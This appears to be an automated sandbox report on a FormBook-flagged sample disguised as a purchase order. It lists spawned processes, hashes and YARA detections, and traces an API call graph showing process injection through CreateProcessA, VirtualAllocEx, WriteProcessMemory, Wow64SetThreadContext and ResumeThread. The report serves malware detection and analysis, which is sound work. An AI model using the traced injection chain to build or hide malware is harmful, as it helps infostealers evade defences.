                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:23:35:07
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe"
                                                                        Imagebase:0xfe0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:7
                                                                        Start time:23:35:09
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\SysWOW64\shutdown.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\shutdown.exe"
                                                                        Imagebase:0x120000
                                                                        File size:23'552 bytes
                                                                        MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:9
                                                                        Start time:23:35:21
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe"
                                                                        Imagebase:0xfe0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:10
                                                                        Start time:23:35:33
                                                                        Start date:08/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:11.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:251
                                                                          Total number of Limit Nodes:14
                                                                          execution_graph 56171 4a2f460 56172 4a2f4a6 56171->56172 56175 4a2f640 56172->56175 56178 4a2ef78 56175->56178 56179 4a2f6a8 DuplicateHandle 56178->56179 56180 4a2f593 56179->56180 56427 4a2d3c0 56428 4a2d402 56427->56428 56429 4a2d408 GetModuleHandleW 56427->56429 56428->56429 56430 4a2d435 56429->56430 56431 aad01c 56432 aad034 56431->56432 56433 aad08e 56432->56433 56438 4b42c9c 56432->56438 56447 4b4407b 56432->56447 56451 4b44de9 56432->56451 56460 4b44088 56432->56460 56439 4b42ca7 56438->56439 56440 4b44e59 56439->56440 56442 4b44e49 56439->56442 56480 4b42dc4 56440->56480 56464 4b44f80 56442->56464 56469 4b4504c 56442->56469 56475 4b44f70 56442->56475 56443 4b44e57 56443->56443 56448 4b440ae 56447->56448 56449 4b42c9c CallWindowProcW 56448->56449 56450 4b440cf 56449->56450 56450->56433 56454 4b44e25 56451->56454 56452 4b44e59 56453 4b42dc4 CallWindowProcW 56452->56453 56456 4b44e57 56453->56456 56454->56452 56455 4b44e49 56454->56455 56457 4b44f80 CallWindowProcW 56455->56457 56458 4b44f70 CallWindowProcW 56455->56458 56459 4b4504c CallWindowProcW 56455->56459 56456->56456 56457->56456 56458->56456 56459->56456 56461 4b440ae 56460->56461 56462 4b42c9c CallWindowProcW 56461->56462 56463 4b440cf 56462->56463 56463->56433 56466 4b44f94 56464->56466 56465 4b45020 56465->56443 56484 4b45038 56466->56484 56487 4b45029 56466->56487 56470 4b4500a 56469->56470 56471 4b4505a 56469->56471 56473 4b45038 CallWindowProcW 56470->56473 56474 4b45029 CallWindowProcW 56470->56474 56472 4b45020 56472->56443 56473->56472 56474->56472 56477 4b44f94 56475->56477 56476 4b45020 56476->56443 56478 4b45038 CallWindowProcW 56477->56478 56479 4b45029 CallWindowProcW 56477->56479 56478->56476 56479->56476 56481 4b42dcf 56480->56481 56482 4b4653a CallWindowProcW 56481->56482 56483 4b464e9 56481->56483 56482->56483 56483->56443 56485 4b45049 56484->56485 56490 4b4647e 56484->56490 56485->56465 56488 4b45049 56487->56488 56489 4b4647e CallWindowProcW 56487->56489 56488->56465 56489->56488 56491 4b42dc4 CallWindowProcW 56490->56491 56492 4b4648a 56491->56492 56492->56485 56181 4b49428 56183 4b49468 56181->56183 56184 4b4c2d0 56183->56184 56185 4b49064 56183->56185 56186 4b4906f 56185->56186 56189 4b491e4 56186->56189 56188 4b4c43e 56188->56183 56190 4b491ef 56189->56190 56195 4a28e90 56190->56195 56199 4a29bb1 56190->56199 56204 4a29ad0 56190->56204 56191 4b4c62c 56191->56188 56196 4a28e9b 56195->56196 56208 4a28ec0 56196->56208 56198 4a29b85 56198->56191 56200 4a29bba 56199->56200 56201 4a29b78 56199->56201 56200->56191 56202 4a28ec0 CreateWindowExW 56201->56202 56203 4a29b85 56201->56203 56202->56203 56203->56191 56205 4a29ae0 56204->56205 56206 4a28ec0 CreateWindowExW 56205->56206 56207 4a29b85 56206->56207 56207->56191 56210 4a28ecb 56208->56210 56209 4a2aa29 56209->56198 56210->56209 56212 4a2f198 56210->56212 56213 4a2f1b9 56212->56213 56214 4a2f1dd 56213->56214 56216 4a2f348 56213->56216 56214->56209 56218 4a2f355 56216->56218 56217 4a2f38f 56217->56214 56218->56217 56220 4a2eeb0 56218->56220 56221 4a2eebb 56220->56221 56222 4a2fca0 56221->56222 56224 4a2efdc 56221->56224 56225 4a2efe7 56224->56225 56226 4a28ec0 CreateWindowExW 56225->56226 56227 4a2fd0f 56226->56227 56231 4b41d28 56227->56231 56236 4b41d40 56227->56236 56228 4a2fd49 56228->56222 56232 4b41d35 56231->56232 56233 4b41d7d 56232->56233 56242 4b42fa0 56232->56242 56247 4b42f90 56232->56247 56233->56228 56238 4b41d71 56236->56238 56239 4b41e71 56236->56239 56237 4b41d7d 56237->56228 56238->56237 56240 4b42fa0 CreateWindowExW 56238->56240 56241 4b42f90 CreateWindowExW 56238->56241 56239->56228 56240->56239 56241->56239 56243 4b42fcb 56242->56243 56244 4b4307a 56243->56244 56245 4b43e80 CreateWindowExW 56243->56245 56246 4b43dbe CreateWindowExW 56243->56246 56245->56244 56246->56244 56248 4b42fcb 56247->56248 56249 4b4307a 56248->56249 56250 4b43e80 CreateWindowExW 56248->56250 56251 4b43dbe CreateWindowExW 56248->56251 56250->56249 56251->56249 56252 705db18 56253 705db3f 56252->56253 56257 705de40 56253->56257 56263 705de30 56253->56263 56254 705dbbc 56258 705de67 56257->56258 56259 705df22 56258->56259 56269 513b2b3 56258->56269 56274 513b2ef 56258->56274 56278 513b328 56258->56278 56259->56254 56264 705de34 56263->56264 56265 705df22 56264->56265 56266 513b2b3 PostMessageW 56264->56266 56267 513b328 PostMessageW 56264->56267 56268 513b2ef PostMessageW 56264->56268 56265->56254 56266->56265 56267->56265 56268->56265 56270 513b2ba 56269->56270 56273 513b331 56269->56273 56270->56259 56271 513b2f3 56271->56259 56273->56271 56283 5131c48 56273->56283 56275 513b2ba 56274->56275 56277 513b2b3 56274->56277 56275->56259 56276 5131c48 PostMessageW 56276->56277 56277->56275 56277->56276 56279 513b2eb 56278->56279 56282 513b32b 56278->56282 56279->56259 56280 513b2f3 56280->56259 56281 5131c48 PostMessageW 56281->56282 56282->56280 56282->56281 56284 513b5b8 PostMessageW 56283->56284 56285 513b624 56284->56285 56285->56273 56286 513924c 56287 5139266 56286->56287 56291 513a156 56286->56291 56305 513a0f8 56286->56305 56318 513a0e9 56286->56318 56292 513a0e4 56291->56292 56294 513a159 56291->56294 56293 513a136 56292->56293 56331 513aa4d 56292->56331 56337 513a5ee 56292->56337 56341 513a51f 56292->56341 56346 513a648 56292->56346 56351 513a6f8 56292->56351 56356 513a8c8 56292->56356 56361 513aba9 56292->56361 56365 513a8f5 56292->56365 56370 513a805 56292->56370 56375 513a6a7 56292->56375 56293->56287 56294->56287 56306 513a112 56305->56306 56307 513a6a7 2 API calls 56306->56307 56308 513a805 2 API calls 56306->56308 56309 513a8f5 2 API calls 56306->56309 56310 513aba9 2 API calls 56306->56310 56311 513a8c8 2 API calls 56306->56311 56312 513a6f8 2 API calls 56306->56312 56313 513a648 2 API calls 56306->56313 56314 513a51f 2 API calls 56306->56314 56315 513a136 56306->56315 56316 513a5ee 2 API calls 56306->56316 56317 513aa4d 2 API calls 56306->56317 56307->56315 56308->56315 56309->56315 56310->56315 56311->56315 56312->56315 56313->56315 56314->56315 56315->56287 56316->56315 56317->56315 56319 513a112 56318->56319 56320 513a136 56319->56320 56321 513a6a7 2 API calls 56319->56321 56322 513a805 2 API calls 56319->56322 56323 513a8f5 2 API calls 56319->56323 56324 513aba9 2 API calls 56319->56324 56325 513a8c8 2 API calls 56319->56325 56326 513a6f8 2 API calls 56319->56326 56327 513a648 2 API calls 56319->56327 56328 513a51f 2 API calls 56319->56328 56329 513a5ee 2 API calls 56319->56329 56330 513aa4d 2 API calls 56319->56330 56320->56287 56321->56320 56322->56320 56323->56320 56324->56320 56325->56320 56326->56320 56327->56320 56328->56320 56329->56320 56330->56320 56332 513a820 56331->56332 56333 513aa5a 56331->56333 56379 5138098 56332->56379 56383 5138091 56332->56383 56334 513a598 56334->56293 56387 51389b0 56337->56387 56391 51389b8 56337->56391 56338 513a598 56338->56293 56342 513a525 56341->56342 56395 5138dd8 56342->56395 56399 5138dcc 56342->56399 56347 513ab3c 56346->56347 56403 5138c40 56347->56403 56407 5138c38 56347->56407 56348 513ab0d 56348->56293 56352 513a705 56351->56352 56411 5138b50 56352->56411 56415 5138b49 56352->56415 56353 513acec 56353->56293 56357 513a8d1 56356->56357 56359 5138b50 WriteProcessMemory 56357->56359 56360 5138b49 WriteProcessMemory 56357->56360 56358 513ac93 56359->56358 56360->56358 56363 5138b50 WriteProcessMemory 56361->56363 56364 5138b49 WriteProcessMemory 56361->56364 56362 513abd7 56362->56293 56363->56362 56364->56362 56366 513a8fb 56365->56366 56367 513ae90 56366->56367 56368 51389b0 Wow64SetThreadContext 56366->56368 56369 51389b8 Wow64SetThreadContext 56366->56369 56367->56293 56368->56366 56369->56366 56371 513a80f 56370->56371 56373 5138091 ResumeThread 56371->56373 56374 5138098 ResumeThread 56371->56374 56372 513a598 56372->56293 56373->56372 56374->56372 56419 5138a90 56375->56419 56423 5138a88 56375->56423 56376 513a6c5 56376->56293 56380 51380d8 ResumeThread 56379->56380 56382 5138109 56380->56382 56382->56334 56384 5138098 ResumeThread 56383->56384 56386 5138109 56384->56386 56386->56334 56388 51389b8 Wow64SetThreadContext 56387->56388 56390 5138a45 56388->56390 56390->56338 56392 51389fd Wow64SetThreadContext 56391->56392 56394 5138a45 56392->56394 56394->56338 56396 5138e61 56395->56396 56396->56396 56397 5138fc6 CreateProcessA 56396->56397 56398 5139023 56397->56398 56398->56398 56400 5138dd8 56399->56400 56400->56400 56401 5138fc6 CreateProcessA 56400->56401 56402 5139023 56401->56402 56402->56402 56404 5138c8b ReadProcessMemory 56403->56404 56406 5138ccf 56404->56406 56406->56348 56408 5138c40 ReadProcessMemory 56407->56408 56410 5138ccf 56408->56410 56410->56348 56412 5138b98 WriteProcessMemory 56411->56412 56414 5138bef 56412->56414 56414->56353 56416 5138b50 WriteProcessMemory 56415->56416 56418 5138bef 56416->56418 56418->56353 56420 5138ad0 VirtualAllocEx 56419->56420 56422 5138b0d 56420->56422 56422->56376 56424 5138a90 VirtualAllocEx 56423->56424 56426 5138b0d 56424->56426 56426->56376

                                                                          Executed Functions

                                                                          Function 07055840 Relevance: 5.3, Strings: 4, Instructions: 330COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 669 7055840-7055863 670 7055865-705586b 669->670 671 705586e-705588e 669->671 670->671 674 7055895-705589c 671->674 675 7055890 671->675 677 705589e-70558a9 674->677 676 7055c24-7055c2d 675->676 678 7055c35-7055c47 677->678 679 70558af-70558c2 677->679 682 70558c4-70558d2 679->682 683 70558d8-70558f3 679->683 682->683 686 7055bac-7055bb3 682->686 687 70558f5-70558fb 683->687 688 7055917-705591a 683->688 686->676 691 7055bb5-7055bb7 686->691 689 7055904-7055907 687->689 690 70558fd 687->690 692 7055a74-7055a7a 688->692 693 7055920-7055923 688->693 695 705593a-7055940 689->695 696 7055909-705590c 689->696 690->689 690->692 694 7055b66-7055b69 690->694 690->695 697 7055bc6-7055bcc 691->697 698 7055bb9-7055bbe 691->698 692->694 699 7055a80-7055a85 692->699 693->692 700 7055929-705592f 693->700 701 7055c30 694->701 702 7055b6f-7055b75 694->702 703 7055946-7055948 695->703 704 7055942-7055944 695->704 705 70559a6-70559ac 696->705 706 7055912 696->706 697->678 707 7055bce-7055bd3 697->707 698->697 699->694 700->692 708 7055935 700->708 701->678 710 7055b77-7055b7f 702->710 711 7055b9a-7055b9e 702->711 712 7055952-705595b 703->712 704->712 705->694 709 70559b2-70559b8 705->709 706->694 713 7055bd5-7055bda 707->713 714 7055c18-7055c1b 707->714 708->694 715 70559be-70559c0 709->715 716 70559ba-70559bc 709->716 710->678 717 7055b85-7055b94 710->717 711->686 720 7055ba0-7055ba6 711->720 718 705595d-7055968 712->718 719 705596e-7055996 712->719 713->701 722 7055bdc 713->722 714->701 721 7055c1d-7055c22 714->721 723 70559ca-70559e1 715->723 716->723 717->683 717->711 718->694 718->719 742 705599c-70559a1 719->742 743 7055a8a-7055ac0 719->743 720->677 720->686 721->676 721->691 724 7055be3-7055be8 722->724 735 70559e3-70559fc 723->735 736 7055a0c-7055a33 723->736 725 7055c0a-7055c0c 724->725 726 7055bea-7055bec 724->726 725->701 733 7055c0e-7055c11 725->733 730 7055bee-7055bf3 726->730 731 7055bfb-7055c01 726->731 730->731 731->678 734 7055c03-7055c08 731->734 733->714 734->725 738 7055bde-7055be1 734->738 735->743 747 7055a02-7055a07 735->747 736->701 746 7055a39-7055a3c 736->746 738->701 738->724 742->743 749 7055ac2-7055ac6 743->749 750 7055acd-7055ad5 743->750 746->701 751 7055a42-7055a6b 746->751 747->743 752 7055ae5-7055ae9 749->752 753 7055ac8-7055acb 749->753 750->701 754 7055adb-7055ae0 750->754 751->743 766 7055a6d-7055a72 751->766 755 7055b08-7055b0c 752->755 756 7055aeb-7055af1 752->756 753->750 753->752 754->694 759 7055b16-7055b32 755->759 760 7055b0e-7055b14 755->760 756->755 758 7055af3-7055afb 756->758 758->701 761 7055b01-7055b06 758->761 767 7055b35 call 7055e27 759->767 768 7055b35 call 7055e28 759->768 760->759 763 7055b3b-7055b3f 760->763 761->694 763->694 764 7055b41-7055b5d 763->764 764->694 766->743 767->763 768->763
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$,gq$,gq
                                                                          • API String ID: 0-2401767512
                                                                          • Opcode ID: d058445b1e5baf9ddbea0cd0bc5dcd6d9f327118cd6d3a9df34e53d15e6047db
                                                                          • Instruction ID: b46a49ab3c2e0c4b7ee8574e79a109a1c51eb75962bc0e1a7fcecd025f565dde
                                                                          • Opcode Fuzzy Hash: d058445b1e5baf9ddbea0cd0bc5dcd6d9f327118cd6d3a9df34e53d15e6047db
                                                                          • Instruction Fuzzy Hash: 63D12CB1A10109DFDB54CFA9C888AAEBBF3FF88310F558255E815AB2A0D734ED51CB50
                                                                          Function 070550D8 Relevance: 3.1, Strings: 2, Instructions: 570COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$Hgq
                                                                          • API String ID: 0-2239030825
                                                                          • Opcode ID: c7148967b43198726f618d7b26b4befa8cc0a6954678409679792b3898224fe5
                                                                          • Instruction ID: 91d37e11d2af9e286bb67d62c8e21ce73ee35ed5aeff20fa9500ef4972637bce
                                                                          • Opcode Fuzzy Hash: c7148967b43198726f618d7b26b4befa8cc0a6954678409679792b3898224fe5
                                                                          • Instruction Fuzzy Hash: CE2279B4A002199FDB14DF69C854AAFBBF7FF88304F208669E805DB291DB349D55CB90
                                                                          Function 07052106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D
                                                                          • API String ID: 0-2746444292
                                                                          • Opcode ID: b9817fe38864e5f9e1735f9dc667d44ea214a0a48c60678b0c66977f4b0b8129
                                                                          • Instruction ID: 246a99c31d11d4b266a00330097ce503fb68588a4e37358397520e3c75e7e708
                                                                          • Opcode Fuzzy Hash: b9817fe38864e5f9e1735f9dc667d44ea214a0a48c60678b0c66977f4b0b8129
                                                                          • Instruction Fuzzy Hash: A252DB74A012298FDB64DF68C998B9EB7B2FF89301F1045D9D509A7391CB34AE81CF91
                                                                          Function 0705C058 Relevance: .5, Instructions: 506COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 059e276efbaf16245931c49a23be9e58eef9909459830031a6f0faeabfb6b15a
                                                                          • Instruction ID: 6b5f99097a448f04aea95585351f10d27b93226dabe06813811a69acb774475a
                                                                          • Opcode Fuzzy Hash: 059e276efbaf16245931c49a23be9e58eef9909459830031a6f0faeabfb6b15a
                                                                          • Instruction Fuzzy Hash: E14260B8A01219CFDB54CFA9C984B9EBBB2FB48310F1482A9D819A7355D735AD81CF50
                                                                          Function 0705A988 Relevance: .5, Instructions: 482COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e09619c7445c2b8966812bd09273398433b7d7884a904002aa1cc5f52596ed8c
                                                                          • Instruction ID: 2ca096aaf0ab28df7a50c4e8cd995623745248c844e91260296aa66f80aa9978
                                                                          • Opcode Fuzzy Hash: e09619c7445c2b8966812bd09273398433b7d7884a904002aa1cc5f52596ed8c
                                                                          • Instruction Fuzzy Hash: 3032D3B0A11219CFDB60DF58C584A9EFBF2BF48315F55C296D448AB212CB30E985CFA5
                                                                          Function 0513C070 Relevance: .3, Instructions: 341COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 520650ad79212bfee938aefcdc52dbf50ed47212af7c57e2c00bf5acc2297edf
                                                                          • Instruction ID: d234ad4b916166eaa1269960bb2965212f6104e0d1cddf951003c8413064af48
                                                                          • Opcode Fuzzy Hash: 520650ad79212bfee938aefcdc52dbf50ed47212af7c57e2c00bf5acc2297edf
                                                                          • Instruction Fuzzy Hash: 45C1DC717006008FEB29DBB9C560B6EB7F6AF8A608F10446DD14AEB290DF34ED01CB91
                                                                          Function 0705C057 Relevance: .1, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b97de4025bc0e4e4f846b92600d08cf64e38dc7731e3733d23c6928c27ad6b93
                                                                          • Instruction ID: eb823d870b5f9ee5bd02e1ff9110198062b6daf3e94601571081b613edf8faaf
                                                                          • Opcode Fuzzy Hash: b97de4025bc0e4e4f846b92600d08cf64e38dc7731e3733d23c6928c27ad6b93
                                                                          • Instruction Fuzzy Hash: 656183B5E01219CFEB18CFAAD984B9EBBB2FF88310F1481A9D809A7354D7759941CF50
                                                                          Function 0705A979 Relevance: .1, Instructions: 112COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d11dde5943505f743018a68a0f3cc9b01b32f03da2f2da0ce92b648a69d2fca6
                                                                          • Instruction ID: d49d42de9b0e9511202e572d35550d057b169faccd14b9f9b0f158ea96330653
                                                                          • Opcode Fuzzy Hash: d11dde5943505f743018a68a0f3cc9b01b32f03da2f2da0ce92b648a69d2fca6
                                                                          • Instruction Fuzzy Hash: D94109B0E006198FEB58CF6AC84079EBBF2BF89301F14C1AAD458A6255EB341A858F51
                                                                          Function 0705A987 Relevance: .1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 906c3577a246db17126061a016199ed566ae8d83e609f60e13fea39c0a4509e0
                                                                          • Instruction ID: 5e9aa1e6f23077db43f4e3a2a1373f6d2bc0a67da58cb386b59ec772e46ac09b
                                                                          • Opcode Fuzzy Hash: 906c3577a246db17126061a016199ed566ae8d83e609f60e13fea39c0a4509e0
                                                                          • Instruction Fuzzy Hash: 7341D7B0E006198FEB58DF6AC84079EBBF2FF88301F14C1A9D45CA7255EB341A858F51
                                                                          Function 07055E28 Relevance: 10.4, Strings: 8, Instructions: 447COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 527 7055e28-7055e4d 528 7055e53-7055e76 527->528 529 705627c-7056280 527->529 538 7055f24-7055f28 528->538 539 7055e7c-7055e89 528->539 530 7056282-7056296 529->530 531 7056299-70562a7 529->531 535 70562a9-70562be 531->535 536 7056318-705632d 531->536 547 70562c5-70562d2 535->547 548 70562c0-70562c3 535->548 549 7056334-7056341 536->549 550 705632f-7056332 536->550 542 7055f70-7055f79 538->542 543 7055f2a-7055f38 538->543 551 7055e98 539->551 552 7055e8b-7055e96 539->552 545 705638f 542->545 546 7055f7f-7055f89 542->546 543->542 562 7055f3a-7055f55 543->562 559 7056394-70563ae 545->559 546->529 553 7055f8f-7055f98 546->553 554 70562d4-7056315 547->554 548->554 555 7056343-705637e 549->555 550->555 563 7055e9a-7055e9c 551->563 552->563 557 7055fa7-7055fb3 553->557 558 7055f9a-7055f9f 553->558 599 7056385-705638c 555->599 557->559 566 7055fb9-7055fbf 557->566 558->557 584 7055f57-7055f61 562->584 585 7055f63 562->585 563->538 565 7055ea2-7055f04 563->565 609 7055f06 565->609 610 7055f0a-7055f21 565->610 570 7055fc5-7055fd5 566->570 571 7056266-705626a 566->571 582 7055fd7-7055fe7 570->582 583 7055fe9-7055feb 570->583 571->545 574 7056270-7056276 571->574 574->529 574->553 586 7055fee-7055ff4 582->586 583->586 587 7055f65-7055f67 584->587 585->587 586->571 590 7055ffa-7056009 586->590 587->542 593 7055f69 587->593 595 70560b7-70560e2 call 7055c60 * 2 590->595 596 705600f 590->596 593->542 613 70561cc-70561e6 595->613 614 70560e8-70560ec 595->614 598 7056012-7056023 596->598 598->559 602 7056029-705603b 598->602 602->559 604 7056041-7056059 602->604 667 705605b call 7056800 604->667 668 705605b call 70567ff 604->668 608 7056061-7056071 608->571 612 7056077-705607a 608->612 609->610 610->538 615 7056084-7056087 612->615 616 705607c-7056082 612->616 613->529 634 70561ec-70561f0 613->634 614->571 618 70560f2-70560f6 614->618 615->545 619 705608d-7056090 615->619 616->615 616->619 621 705611e-7056124 618->621 622 70560f8-7056105 618->622 623 7056092-7056096 619->623 624 7056098-705609b 619->624 625 7056126-705612a 621->625 626 705615f-7056165 621->626 639 7056114 622->639 640 7056107-7056112 622->640 623->624 627 70560a1-70560a5 623->627 624->545 624->627 625->626 632 705612c-7056135 625->632 630 7056167-705616b 626->630 631 7056171-7056177 626->631 627->545 628 70560ab-70560b1 627->628 628->595 628->598 630->599 630->631 635 7056183-7056185 631->635 636 7056179-705617d 631->636 637 7056144-705615a 632->637 638 7056137-705613c 632->638 641 70561f2-70561fc call 7054b10 634->641 642 705622c-7056230 634->642 643 7056187-7056190 635->643 644 70561ba-70561bc 635->644 636->571 636->635 637->571 638->637 645 7056116-7056118 639->645 640->645 641->642 655 70561fe-7056213 641->655 642->599 646 7056236-705623a 642->646 648 7056192-7056197 643->648 649 705619f-70561b5 643->649 644->571 651 70561c2-70561c9 644->651 645->571 645->621 646->599 653 7056240-705624d 646->653 648->649 649->571 658 705625c 653->658 659 705624f-705625a 653->659 655->642 664 7056215-705622a 655->664 661 705625e-7056260 658->661 659->661 661->571 661->599 664->529 664->642 667->608 668->608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                                                          • API String ID: 0-3338910979
                                                                          • Opcode ID: d446157c32f67bbd70c55546e6b00b0bf7a6af8dacc8ccf8ffe0e4b593999cd0
                                                                          • Instruction ID: cd7b1ea1a3bfa07b9f0ed5c88ffaf007193d035d41b91f7dad99ed3fc737412a
                                                                          • Opcode Fuzzy Hash: d446157c32f67bbd70c55546e6b00b0bf7a6af8dacc8ccf8ffe0e4b593999cd0
